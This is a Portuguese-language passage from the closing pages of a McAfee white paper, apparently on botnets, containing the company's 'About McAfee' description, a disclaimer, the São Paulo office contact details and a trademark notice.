multidisciplinares do McAfee Labs em 30 países acompanham toda a gama de ameaças em tempo real,
identificando vulnerabilidades em aplicativos, analisando e correlacionando riscos e permitindo uma
remediação instantânea para proteger as empresas e o público.
Sobre a McAfee
A McAfee, Inc., sediada em Santa Clara, Califórnia, é a maior empresa do mundo dedicada à tecnologia de
segurança. Totalmente comprometida em combater os rigorosos desafios de segurança globais, a McAfee
provê soluções proativas e com qualidade comprovada e serviços que ajudam a manter sistemas e redes
protegidos mundialmente, permitindo aos usuários conectarem-se à Internet, navegarem e realizarem
compras pela Web com segurança. Apoiada por uma equipe de pesquisas premiada, a McAfee desenvolve
produtos inovadores que capacitam os usuários domésticos, as empresas dos setores público e privado
e os provedores de serviços, permitindo-lhes manter a conformidade com as regulamentações de mercado,
proteger dados, prevenir interrupções, identificar vulnerabilidades e monitorar continuamente, além de
incrementar a segurança em TI. www.mcafee.com.br.
As informações deste documento são fornecidas somente para fins educacionais e para conveniência dos clientes da McAfee. As informações
aqui contidas estão sujeitas a alterações sem notificação, sendo fornecidas “no estado”, sem garantia de qualquer espécie quanto à precisão
e aplicabilidade das informações a qualquer circunstância ou situação específica.
McAfee do Brasil Comércio de Software Ltda.
Av. das Nações Unidas, 8.501 - 16° andar
CEP 05425-070 - São Paulo - SP - Brasil
Telefone: +55 (11) 3711-8200
Fax: +55 (11) 3711-8286
www.mcafee.com.br
McAfee e o logotipo McAfee são marcas registradas ou marcas comerciais da McAfee, Inc. e/ou de suas subsidiárias nos Estados Unidos e em
outros países. Os outros nomes e marcas podem ser propriedade de terceiros. Os planos, especificações e descrições de produtos aqui contidos
são fornecidos apenas com fins informativos e estão sujeitos a alterações sem notificação prévia. Eles são fornecidos sem garantia de qualquer
espécie, expressa ou implícita.
10204wp_botnets_0710_ETMG